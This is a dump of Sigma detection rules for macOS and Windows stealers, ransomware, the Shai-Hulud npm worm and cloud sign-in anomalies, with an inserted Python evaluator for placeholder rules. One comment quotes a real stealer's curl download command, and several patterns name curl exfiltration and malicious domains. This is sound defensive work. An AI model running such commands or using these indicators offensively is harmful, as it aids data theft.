    "content": "title: Atomic MacOS Stealer - Persistence Indicators\nid: e710a880-1f18-4417-b6a0-b5afdf7e3023\nstatus: experimental\ndescription: |\n    Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.\nreferences:\n    - https://moonlock.com/amos-backdoor-persistent-access\n    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44\nauthor: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)\ndate: 2025-11-22\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1564.001\n    - attack.t1543.004\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: macos\ndetection:\n    selection_user_helper:\n        # sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app\n        Image|endswith: '/curl'\n        TargetFilename|startswith: '/Users/'\n        TargetFilename|endswith: '.helper'\n    selection_launchdaemon:\n        TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/proc_creation_macos_malware_amos_curl_post.yml",
    "content": "title: Atomic MacOS Stealer - FileGrabber Activity\nid: e710a880-1f18-4417-b6a0-b5afdf7e33da\nrelated:\n    - id: e710a880-1f18-4417-b6a0-b5afdf7e305a\n      type: obsolete\nstatus: experimental\ndescription: |\n    Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html\n    - https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing\n    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36\n    - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/\nauthor: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)\ndate: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.002\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_curl_post:\n        CommandLine|contains|all:\n            - 'curl'\n            - 'POST'\n            - 'user:'\n            - '-H '\n            - 'BuildID'\n            - 'file=@/tmp/out.zip'\n            - 'cl: 0'\n    selection_filegrabber_exec:\n        CommandLine|contains|all:\n            - 'FileGrabber'\n            - '/tmp'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon.yml",
    "content": "title: Grixba Malware Reconnaissance Activity\nid: af688c76-4ce4-4309-bfdd-e896f01acf27\nstatus: experimental\ndescription: |\n    Detects execution of the Grixba reconnaissance tool based on suspicious command-line parameter combinations.\n    This tool is used by the Play ransomware group for network enumeration, data gathering, and event log clearing.\nreferences:\n    - https://fieldeffect.com/blog/grixba-play-ransomware-impersonates-sentinelone\n    - https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/\nauthor: yxinmiracle, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-26\ntags:\n    - attack.reconnaissance\n    - attack.t1595.001\n    - attack.discovery\n    - attack.t1046\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_mode_flag:\n        CommandLine|contains:\n            - '-m '\n            - '-mode '\n            - '-m:'\n            - '-mode:'\n    selection_input_flag:\n        CommandLine|contains:\n            - '-i '\n            - '-input '\n            - '-i:'\n            - '-input:'\n    selection_scan_value:\n        CommandLine|contains:\n            - 'scan '\n            - 'scanall '\n    selection_input_options:\n        CommandLine|contains:\n            - ':f '\n            - ':r '\n            - ':s '\n            - ' f '\n            - ' r '\n            - ' s '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate tools that use similar command-line argument structures (e.g., a tool with '--mode scan' and '--input file.txt') could trigger this rule. However, the specific combinations are indicative of reconnaissance or defense evasion.\nlevel: high\nregression_tests_path: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/info.yml\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Katz-Stealer/dns_query_win_katz_stealer_domain.yml",
    "content": "title: DNS Query To Katz Stealer Domains\nid: 9c3d6e32-f4c8-4d73-8b8f-95c3b383a13c\nrelated:\n    - id: 6b0c762f-0e1b-435f-a829-5943b08fe36a\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries to domains associated with Katz Stealer malware.\n    Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.\n    In Enterprise environments, DNS queries to these domains may indicate potential malicious activity or compromise.\nreferences:\n    - Internal Research\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains:\n            - 'katz-panel.com'\n            - 'katz-stealer.com'\n            - 'katzstealer.com'\n            - 'twist2katz.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Katz-Stealer/image_load_win_katz_stealer_payloads.yml",
    "content": "title: Katz Stealer DLL Loaded\nid: e6c7ab7c-c79d-4b84-b913-b2ec3f8e8a98\nstatus: experimental\ndescription: |\n    Detects loading of DLLs associated with Katz Stealer malware 2025 variants.\n    Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.\n    Processes that load these DLLs are very likely to be malicious.\nreferences:\n    - Internal Research\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.execution\n    - attack.t1129\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\katz_ontop.dll'\n            - '\\AppData\\Local\\Temp\\received_dll.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Katz-Stealer/net_dns_katz_stealer_domain.yml",
    "content": "title: DNS Query To Katz Stealer Domains - Network\nid: 6b0c762f-0e1b-435f-a829-5943b08fe36a\nrelated:\n    - id: 9c3d6e32-f4c8-4d73-8b8f-95c3b383a13c\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries to domains associated with Katz Stealer malware.\n    Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems.\n    In Enterprise environments, DNS queries to these domains may indicate potential malicious activity or compromise.\nreferences:\n    - Internal research\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - detection.emerging-threats\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|contains:\n            - 'katz-panel.com'\n            - 'katz-stealer.com'\n            - 'katzstealer.com'\n            - 'twist2katz.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Katz-Stealer/zeek_http_katz_stealer_susp_useragent.yml",
    "content": "title: Katz Stealer Suspicious User-Agent\nid: 834c6d2f-5e98-4b2a-b453-0c4f234afedd\nstatus: experimental\ndescription: |\n    Detects network connections with a suspicious user-agent string containing \"katz-ontop\", which may indicate Katz Stealer activity.\nreferences:\n    - Internal Research\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-05-22\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - detection.emerging-threats\nlogsource:\n    product: zeek\n    service: http\ndetection:\n    selection:\n        user_agent|contains: 'katz-ontop'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Shai-Hulud/file_event_lnx_mal_shai_hulud_workflow.yml",
    "content": "title: Shai-Hulud Malicious GitHub Workflow Creation\nid: 0aba5685-6db6-486f-88ef-29a99c545cfd\nstatus: experimental\ndescription: Detects creation of the shai-hulud-workflow.yml file associated with the Shai-Hulud worm, an NPM supply chain attack that exfiltrates GitHub secrets.\nreferences:\n    - https://www.safetycli.com/blog/shai-hulud-npm-attack-runs-malicious-github-action\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.persistence\n    - attack.credential-access\n    - attack.t1552.001\n    - attack.collection\n    - attack.t1119\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.github/workflows/shai-hulud-workflow.yml'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Shai-Hulud/github_mal_shai_hulud_npm_attack.yml",
    "content": "title: Shai-Hulud NPM Attack GitHub Activity\nid: 69fa9174-4370-4646-8d48-6a22e2853402\nstatus: experimental\ndescription: |\n    Detects GitHub activity associated with the 'Shai-Hulud' NPM supply chain attack. The attack involves malicious NPM packages that use stolen GitHub tokens to create a new branch,\n    inject a malicious workflow file to exfiltrate secrets, and make private repositories public.\nreferences:\n    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.persistence\n    - attack.impact\n    - detection.emerging-threats\nlogsource:\n    product: github\n    service: audit\ndetection:\n    selection:\n        - 'shai-hulud-workflow.yml'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/Shai-Hulud/proc_creation_lnx_mal_shai_hululd_exfiltration.yml",
    "content": "title: Shai-Hulud NPM Package Malicious Exfiltration via Curl\nid: efd2eb09-b72e-4a61-8dc7-b1382a1e8983\nstatus: experimental\ndescription: Detects a potential Shai-Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites.\nreferences:\n    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.exfiltration\n    - attack.t1041\n    - attack.collection\n    - attack.t1005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/curl'\n        CommandLine|contains|all:\n            - 'curl'\n            - '-d'\n            - 'webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/file_event_win_malware_funklocker_ransomware_extension.yml",
    "content": "title: FunkLocker Ransomware File Creation\nid: 2c76a22b-702d-48fd-8fa9-e41e2fe203b3\nstatus: experimental\ndescription: Detects the creation of files with the \".funksec\" extension, which is appended to encrypted files by the FunkLocker ransomware.\nreferences:\n    - https://www.broadcom.com/support/security-center/protection-bulletin/funksec-ransomware\n    - https://www.pcrisk.com/removal-guides/31853-funklocker-funksec-ransomware\nauthor: Saiprashanth Pulisetti (@Prashanthblogs)\ndate: 2025-08-08\ntags:\n    - attack.impact\n    - attack.t1486\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '.funksec'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Malware/proc_creation_win_malware_kalambur_curl_socks_tor.yml",
    "content": "title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution\nid: e99375eb-3ee0-407a-9f90-79569cc6a01c\nstatus: experimental\ndescription: Detects the execution of the \"curl.exe\" command, referencing \"SOCKS\" and \".onion\" domains, which could be indicative of Kalambur backdoor activity.\nreferences:\n    - https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns\nauthor: Arda Buyukkaya (EclecticIQ)\ndate: 2025-02-11\ntags:\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1090\n    - attack.t1573\n    - attack.t1071.001\n    - attack.t1059.001\n    - attack.s0183\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\curl.exe'\n    selection_socks:\n        CommandLine|contains:\n            - 'socks5h://'\n            - 'socks5://'\n            - 'socks4a://'\n    selection_onion:\n        CommandLine|contains: '.onion'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/README.md",
    "content": "# Emerging Threats Rules\n\nThis folder contains rules that belong to the \"emerging-threats\" category of SIGMA. This category aims to cover specific threats that are timely and relevant for certain periods of time. These threats include specific APT campaigns, exploitation of zero-day vulnerabilities, specific malware used during an attack, etc.\n\nThe folder structure is split by year, and every year folder can contain the following sub-folders:\n\n- `Exploits`: Contains specific rules that cover exploitation of vulnerabilities.\n- `Malware`: Contains specific rules that cover malware, ransomware and any type of suspicious software used by Threat Actors or malicious actors.\n- `TA`: Contains specific rules that cover APT, Threat Actor and malware activities.\n"
  },
  {
    "path": "rules-placeholder/README.md",
    "content": "TBD"
  },
  {
    "path": "rules-placeholder/cloud/aws/cloudtrail/aws_cloudtrail_console_login_success_from_susp_locations.yml",
    "content": "title: AWS Console Login Monitoring\nid: 313e72de-0c0d-4d65-8c95-87f4d546eceb\nstatus: experimental\ndescription: |\n    Detects AWS console logins from countries and IP addresses that are not recognized as legitimate for the organization.\n    This alert can help identify potential unauthorized access attempts from unusual locations, which may indicate compromised credentials or malicious activity.\nreferences:\n    - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html\nauthor: Ivan Saakov\ndate: 2025-10-19\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'ConsoleLogin'\n        responseElements.ConsoleLogin: 'Success'\n    filter_main_country:\n        src_country|expand: '%Legitimate_Countries%' # Add legitimate countries here\n    filter_main_ip:\n        src_ip|expand: '%Legitimate_IP_Ranges%' # Add legitimate src_ip ranges here\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate logins from trusted countries and IP addresses.\n    - Login through services hosted through cloud providers in other regions.\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/audit_logs/azure_ad_account_created_deleted_nonapproved_user.yml",
    "content": "title: Account Created And Deleted By Non Approved Users\nid: c98184ba-4a27-4e10-b7b7-da48e71f4d25\nstatus: test\ndescription: Detects accounts that are created or deleted by non-approved users.\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: auditlogs\ndetection:\n    selection:\n        properties.message:\n            - Add user\n            - Delete user\n        Status: Sucess\n    valid_admin:\n        Initiatied.By|expand: '%ApprovedUserUpn%'\n    condition: selection and not valid_admin\nfalsepositives:\n    - Legit administrative action\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/signin_logs/azure_ad_account_signin_outside_hours.yml",
    "content": "title: Authentication Occuring Outside Normal Business Hours\nid: 160f24f3-e6cc-496d-8a3d-f5d06e4ad526\nstatus: test\ndescription: Detects user signs ins outside of normal business hours.\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: Sucess\n        # Countries you DO operate out of e,g GB, use list for mulitple\n        Location|expand: '%LegitCountries%'\n        # outside normal working hours\n        Date|expand: '%ClosingTime%'\n    condition: selection\nfalsepositives:\n    - User doing actual work outside of normal business hours.\nlevel: low\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/signin_logs/azure_privileged_account_no_saw_paw.yml",
    "content": "title: Privilege Role Elevation Not Occuring on SAW or PAW\nid: 38a5e67b-436a-4e77-9f73-f48a82626890\nstatus: test\ndescription: Detects failed sign-in from a PAW or SAW device\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    # You have to tune the rule for your environment before use it\n    selection:\n        properties.message|contains: Add memmber to role completed (PIM aciviation)\n        # Countries you DO operate out of e,g GB, use list for mulitple\n        Location|expand: '%LegitCountries%'\n        IPaddress|expand: '%UnApprovedIp%'\n        # unapproved browser, operating system\n        DeviceInfo|expand: '%UnApprovedDevice%'\n        DeviceDetail.isCompliant: 'false'\n        Status:\n            - Sucess\n            - failure\n    condition: selection\nfalsepositives:\n    - Not using a PAW/SAW in the environment\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/signin_logs/azure_privileged_account_sigin_expected_controls.yml",
    "content": "title: Privilege Role Sign-In Outside Expected Controls\nid: cf1e5687-84e1-41af-97a9-158094efef53\nstatus: test\ndescription: Detects failed sign-in due to user not meeting expected controls for adminitrators\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    # You have to tune the rule for your environment before use it\n    selection:\n        Status: failure\n        # Countries you do NOT operate out of e,g GB, use list for mulitple\n        Location|expand: '%UnLegitCountries%'\n        IPaddress|expand: '%UnApprovedIp%'\n        # unapproved browser, operating system\n        DeviceInfo|expand: '%UnApprovedDevice%'\n    condition: selection\nfalsepositives:\n    - A legit admin not following proper processes\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/cloud/azure/signin_logs/azure_privileged_account_signin_outside_hours.yml",
    "content": "title: Privilege Role Sign-In Outside Of Normal Hours\nid: e927a2f5-e7af-424f-ace7-70ebb49e8976\nstatus: test\ndescription: Detects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated\nreferences:\n    - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nauthor: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'\ndate: 2022-08-11\nmodified: 2023-12-15\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    # You need to tune the rule for your enrivonnement before use\n    selection:\n        Status: Sucess\n        # Countries you DO operate out of e,g GB, use list for mulitple\n        Location|expand: '%LegitCountries%'\n        # outside normal working hours\n        Date|expand: '%ClosingTime%'\n        Initiatied.By|expand: '%ApprovedUserUpn%'\n    condition: selection\nfalsepositives:\n    - An admin doing actual work outside of normal business hours\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_admin_logon.yml",
    "content": "title: User with Privileges Logon\nid: 94309181-d345-4cbf-b5fe-061769bdf9cb\nstatus: test\ndescription: Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672\n    - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964\nauthor: frack113\ndate: 2022-10-14\nmodified: 2023-12-14\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.credential-access\n    - attack.t1558\n    - attack.t1649\n    - attack.t1550\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 4672\n            - 4964\n    filter_main_local_system:\n        SubjectUserSid: 'S-1-5-18'\n    filter_main_valid_account:\n        SubjectUserName|expand: '%Admins_Workstations%' # Set valid internal naming pattern or a list a valid account\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_exploit_cve_2020_1472.yml",
    "content": "title: Potential Zerologon (CVE-2020-1472) Exploitation\nid: dd7876d8-0f09-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472)\nreferences:\n    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472\n    - https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/\nauthor: Aleksandr Akhremchik, @aleqs4ndr, ocsd.community\ndate: 2020-10-15\nmodified: 2023-12-15\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2020-1472\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4742\n        SubjectUserName: 'ANONYMOUS LOGON'\n        TargetUserName|expand: '%DC-MACHINE-NAME%' # DC machine account name that ends with '$'\n    filter_main:\n        PasswordLastSet: '-'\n    condition: selection and not filter_main\nfalsepositives:\n    - Automatic DC computer account password change\n    - Legitimate DC computer account password change\nlevel: high\n"
  },
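The placeholder rules above, for instance the AWS console login rule and the Zerologon rule, lean on two mechanisms: the `expand` modifier, which substitutes an organisation-specific list for a `%placeholder%` name, and the condition shape `selection and not 1 of filter_main_*`, under which a filter block suppresses an event rather than selects it. The following is an added example, not code from the Sigma project or from any rule author, that implements just enough of those semantics in plain Python to run both rules over constructed events. The placeholder contents, the sample events and the treatment of CIDR strings inside IP placeholders are assumptions made for this example; in a real deployment the placeholders are resolved by a pySigma processing pipeline and matching is done by the target SIEM.

```python
"""Minimal evaluator for placeholder-based Sigma rules (added example).

Only the subset of Sigma semantics the rules above need is implemented:
map-style selections (fields ANDed), list values (ORed unless |all),
case-insensitive matching, the modifiers expand/contains/startswith/
endswith/re/all, and the condition "<selections> and not 1 of <filters>".
"""
import ipaddress
import re

# Organisation-specific values that a pySigma pipeline would feed into the
# %placeholder% names. Constructed for this example, not real data.
PLACEHOLDERS = {
    "Legitimate_Countries": ["DE", "NL"],
    "Legitimate_IP_Ranges": ["203.0.113.0/24", "198.51.100.10"],  # CIDR or single address
    "DC-MACHINE-NAME": ["DC01$", "DC02$"],
}


def _one(ev: str, pat: str, mods: list) -> bool:
    """Compare one event value against one pattern under the given modifiers."""
    if "re" in mods:
        return re.search(pat, ev) is not None
    if "endswith" in mods:
        return ev.lower().endswith(pat.lower())
    if "startswith" in mods:
        return ev.lower().startswith(pat.lower())
    if "contains" in mods:
        return pat.lower() in ev.lower()
    if "expand" in mods and "/" in pat:
        # Assumption of this example: an expanded IP placeholder may hold CIDR ranges.
        try:
            return ipaddress.ip_address(ev) in ipaddress.ip_network(pat, strict=False)
        except ValueError:
            return False
    return ev.lower() == pat.lower()


def field_matches(event_value, patterns, mods):
    """Sigma field semantics: a list of values is ORed unless |all is given."""
    if event_value is None:
        return False
    if "expand" in mods:  # replace each %name% by the literals behind it
        patterns = [lit for p in patterns for lit in PLACEHOLDERS[p.strip("%")]]
    results = [_one(str(event_value), str(p), mods) for p in patterns]
    return all(results) if "all" in mods else any(results)


def selection_matches(selection: dict, event: dict) -> bool:
    """All fields of a map-style selection must match (logical AND)."""
    for key, spec in selection.items():
        field, *mods = key.split("|")
        patterns = spec if isinstance(spec, list) else [spec]
        if not field_matches(event.get(field), patterns, mods):
            return False
    return True


def rule_matches(detection: dict, event: dict) -> bool:
    """Every selection* block must match and no filter* block may match,
    i.e. 'selection and not 1 of filter_main_*' / 'selection and not filter_main'."""
    selections = [v for k, v in detection.items() if k.startswith("selection")]
    filters = [v for k, v in detection.items() if k.startswith("filter")]
    return all(selection_matches(s, event) for s in selections) and not any(
        selection_matches(f, event) for f in filters)


def run(detection: dict, events: list) -> list:
    """Return the indexes of the events the rule would alert on."""
    return [i for i, e in enumerate(events) if rule_matches(detection, e)]


# Detection sections transcribed from the two rules above.
AWS_CONSOLE_LOGIN = {
    "selection": {"eventName": "ConsoleLogin", "responseElements.ConsoleLogin": "Success"},
    "filter_main_country": {"src_country|expand": "%Legitimate_Countries%"},
    "filter_main_ip": {"src_ip|expand": "%Legitimate_IP_Ranges%"},
}
ZEROLOGON = {
    "selection": {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON",
                  "TargetUserName|expand": "%DC-MACHINE-NAME%"},
    "filter_main": {"PasswordLastSet": "-"},
}

# Constructed sample events (not real logs); field names are flattened.
AWS_EVENTS = [
    {"eventName": "ConsoleLogin", "responseElements.ConsoleLogin": "Success", "src_country": "DE", "src_ip": "192.0.2.7"},     # trusted country
    {"eventName": "ConsoleLogin", "responseElements.ConsoleLogin": "Success", "src_country": "BR", "src_ip": "203.0.113.42"},  # inside trusted CIDR
    {"eventName": "ConsoleLogin", "responseElements.ConsoleLogin": "Success", "src_country": "BR", "src_ip": "192.0.2.7"},     # alert
    {"eventName": "ConsoleLogin", "responseElements.ConsoleLogin": "Failure", "src_country": "BR", "src_ip": "192.0.2.7"},     # failed login, out of scope
]
ZEROLOGON_EVENTS = [
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC01$", "PasswordLastSet": "-"},                      # attribute change, no password set
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC01$", "PasswordLastSet": "10/15/2020 10:22:31 AM"},  # alert
    {"EventID": 4742, "SubjectUserName": "DC01$", "TargetUserName": "DC01$", "PasswordLastSet": "10/15/2020 10:22:31 AM"},            # regular machine password rotation
    {"EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "WS01$", "PasswordLastSet": "10/15/2020 10:22:31 AM"},  # not a DC account
]

if __name__ == "__main__":
    print("AWS console login alerts:", run(AWS_CONSOLE_LOGIN, AWS_EVENTS))  # [2]
    print("Zerologon alerts:", run(ZEROLOGON, ZEROLOGON_EVENTS))             # [1]
```

Two points the run makes visible: a console login from an unexpected country is still suppressed when the source address falls inside a trusted range, so the two `filter_main_*` blocks are ORed as exclusions, not ANDed; and the Zerologon filter on `PasswordLastSet: '-'` drops the 4742 events that changed some other attribute, leaving only an anonymous-logon password reset on a domain controller machine account. Anything beyond this subset (list-of-map selections such as the DNS rule's `filter_optional_trusted_domains`, `all of`, near-aggregation) is out of scope for this illustration.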
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_potential_pass_the_hash.yml",
    "content": "title: Potential Pass the Hash Activity\nid: f8d98d6c-7a07-4d74-b064-dd4a3c244528\nstatus: test\ndescription: Detects the attack technique pass the hash which is used to move laterally inside the network\nreferences:\n    - https://github.com/nsacyber/Event-Forwarding-Guidance/tree/6e92d622fa33da911f79e7633da4263d632f9624/Events\nauthor: Ilias el Matani (rule), The Information Assurance Directorate at the NSA (method)\ndate: 2017-03-08\nmodified: 2023-12-15\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.t1550.002\n    - car.2016-04-004\nlogsource:\n    product: windows\n    service: security\n    definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624, a failed logon attempt would trigger an event ID 4625\ndetection:\n    selection:\n        EventID:\n            - 4624\n            - 4625\n        LogonType: 3\n        LogonProcessName: 'NtLmSsp'\n        WorkstationName|expand: '%Workstations%'\n        ComputerName|expand: '%Workstations%'\n    filter:\n        TargetUserName: 'ANONYMOUS LOGON'\n    condition: selection and not filter\nfalsepositives:\n    - Administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/windows/builtin/security/win_security_remote_registry_management_via_reg.yml",
